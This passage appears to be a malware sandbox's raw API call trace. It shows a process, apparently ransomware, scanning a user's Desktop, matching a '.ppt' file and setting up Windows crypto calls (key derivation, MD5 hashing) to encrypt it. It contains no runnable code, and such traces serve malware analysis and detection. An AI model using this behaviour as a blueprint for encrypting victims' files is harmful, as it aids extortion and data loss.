lpString1="gAEohzwnBTD\\dU_Aud-fZ3ji9.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AEohzwnBTD\\dU_Aud-fZ3ji9.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EohzwnBTD\\dU_Aud-fZ3ji9.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ohzwnBTD\\dU_Aud-fZ3ji9.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hzwnBTD\\dU_Aud-fZ3ji9.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zwnBTD\\dU_Aud-fZ3ji9.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wnBTD\\dU_Aud-fZ3ji9.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nBTD\\dU_Aud-fZ3ji9.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BTD\\dU_Aud-fZ3ji9.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TD\\dU_Aud-fZ3ji9.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D\\dU_Aud-fZ3ji9.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\dU_Aud-fZ3ji9.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dU_Aud-fZ3ji9.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="U_Aud-fZ3ji9.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_Aud-fZ3ji9.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Aud-fZ3ji9.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ud-fZ3ji9.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="d-fZ3ji9.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-fZ3ji9.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fZ3ji9.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Z3ji9.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.223] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.223] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690940 [0075.223] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0075.223] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0075.223] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0075.223] PeekMessageW (in: lpMsg=0x61ec0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec0c) returned 0 [0075.223] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de00 [0075.223] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e480 [0075.223] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690660 [0075.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ppt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ppt", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0075.223] PeekMessageW (in: lpMsg=0x61ec0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec0c) returned 0 [0075.223] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908e0 [0075.223] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0075.223] PeekMessageW (in: lpMsg=0x61ec0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec0c) returned 0 [0075.223] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd88 [0075.223] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6d8 [0075.224] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908e0 [0075.224] PeekMessageW (in: lpMsg=0x61ec0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec0c) returned 0 [0075.224] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0075.224] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dec8 [0075.224] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac10 [0075.224] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b40 [0075.224] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad60 [0075.224] PeekMessageW (in: lpMsg=0x61ec0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec0c) returned 0 [0075.224] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0075.224] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac70 [0075.224] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.224] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de00 [0075.224] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af88 [0075.224] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906d0 [0075.224] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\dU_Aud-fZ3ji9.ppt", lpFindFileData=0x61e870 | out: lpFindFileData=0x61e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d1bc810, ftCreationTime.dwHighDateTime=0x1d5e129, ftLastAccessTime.dwLowDateTime=0x37bccaf0, ftLastAccessTime.dwHighDateTime=0x1d5e705, ftLastWriteTime.dwLowDateTime=0x37bccaf0, ftLastWriteTime.dwHighDateTime=0x1d5e705, nFileSizeHigh=0x0, nFileSizeLow=0x1267f, dwReserved0=0x61e9c0, dwReserved1=0x657690, cFileName="dU_Aud-fZ3ji9.ppt", cAlternateFileName="DU_AUD~1.PPT")) returned 0x6b8b38 [0075.224] FindClose (in: hFindFile=0x6b8b38 | out: hFindFile=0x6b8b38) returned 1 [0075.224] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.224] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb378 [0075.224] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68da90 [0075.224] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0075.224] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.225] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.225] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3b8 [0075.225] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0075.225] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.225] PeekMessageW (in: lpMsg=0x61e7ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e7ac) returned 0 [0075.225] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3b8 [0075.225] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb648 [0075.225] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.225] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68da90 [0075.225] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e678 [0075.225] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb378 [0075.225] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77710000 [0075.225] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.225] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3b8 [0075.225] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb648 [0075.225] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5e8 [0075.225] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9748 [0075.225] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.225] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3b8 [0075.225] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0075.225] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0075.225] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0075.225] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5e8 [0075.225] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0075.225] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.226] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbf8 [0075.226] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e630 [0075.226] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3b8 [0075.226] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.226] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0075.226] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6c0 [0075.226] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb648 [0075.226] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b018 [0075.226] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76acd0 [0075.226] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5e8 [0075.226] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.226] PeekMessageW (in: lpMsg=0x61e57c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e57c) returned 0 [0075.226] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4f8 [0075.226] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb498 [0075.226] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.226] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e180 [0075.226] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4f8 [0075.226] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb498 [0075.226] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0a8 [0075.226] CryptAcquireContextA (in: phProv=0x61e550, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x61e550*=0x696ad0) returned 1 [0075.227] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3d8 [0075.228] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792010 [0075.228] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9728 [0075.228] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e180 [0075.228] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0a8 [0075.228] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e708 [0075.228] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb468 [0075.228] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.228] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5e8 [0075.228] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a0e00 [0075.228] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4e8 [0075.228] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.228] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5e8 [0075.228] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0075.228] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0075.228] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0075.228] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3c8 [0075.228] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0075.228] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.228] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.228] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.228] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5e8 [0075.228] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0075.228] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0075.228] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0075.228] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5e8 [0075.228] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0075.229] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.229] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5e8 [0075.229] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.229] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8b38 [0075.229] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.229] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb648 [0075.229] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3d8 [0075.229] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9728 [0075.229] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.229] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb648 [0075.229] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3d8 [0075.229] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0075.229] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0075.229] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.231] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dab8 [0075.231] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e678 [0075.231] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3c8 [0075.231] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e630 [0075.231] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e330 [0075.231] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb558 [0075.231] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.231] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4f8 [0075.231] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc48 [0075.231] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0075.231] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.231] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4f8 [0075.231] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb428 [0075.231] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0075.231] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.231] PeekMessageW (in: lpMsg=0x61e27c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e27c) returned 0 [0075.231] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb428 [0075.231] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb478 [0075.231] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.231] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.231] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4f8 [0075.231] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0075.231] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0075.231] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0075.231] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4f8 [0075.231] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0075.231] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.231] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4f8 [0075.231] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.231] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8af8 [0075.231] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.232] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4f8 [0075.232] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc48 [0075.232] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e498 [0075.232] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb428 [0075.232] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.232] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0075.232] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0075.232] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0075.232] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.232] CryptCreateHash (in: hProv=0x696ad0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x61e2c0 | out: phHash=0x61e2c0) returned 1 [0075.232] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.232] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.232] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.232] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.232] CharLowerBuffW (in: lpsz="byte[22]", cchLength=0x8 | out: lpsz="byte[22]") returned 0x8 [0075.232] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.232] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.232] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.232] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0075.232] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.232] CryptHashData (hHash=0x6b89f8, pbData=0x6f96e8, dwDataLen=0x16, dwFlags=0x1) returned 1 [0075.232] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.232] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 